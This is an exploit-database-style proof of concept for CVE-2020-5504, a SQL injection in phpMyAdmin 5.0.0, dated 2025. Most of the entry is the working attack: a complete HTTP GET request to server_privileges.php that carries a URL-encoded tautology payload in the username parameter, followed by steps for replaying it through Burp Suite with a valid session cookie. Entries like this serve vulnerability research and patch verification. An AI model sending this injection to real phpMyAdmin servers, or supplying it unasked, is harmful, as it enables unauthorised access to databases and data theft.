phpMyAdmin 5.0.0 Exploit, SQL Injection

# Exploit Title: phpMyAdmin 5.0.0 - SQL Injection
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpmyadmin/phpmyadmin/
# Software Link: https://github.com/phpmyadmin/phpmyadmin/
# Version: 5.0.0
# Tested on: Windows
# CVE : CVE-2020-5504


Proof Of Concept
GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
Host: phpmyadmin
Connection: close

# Additional conditions:
# - The attacker must have a valid MySQL account to access the server.


Steps to Reproduce
Log in to phpMyAdmin.
Intercept and send the malicious request using a web proxy tool such as Burp Suite; ensure it includes a valid session cookie.
Observe the result.
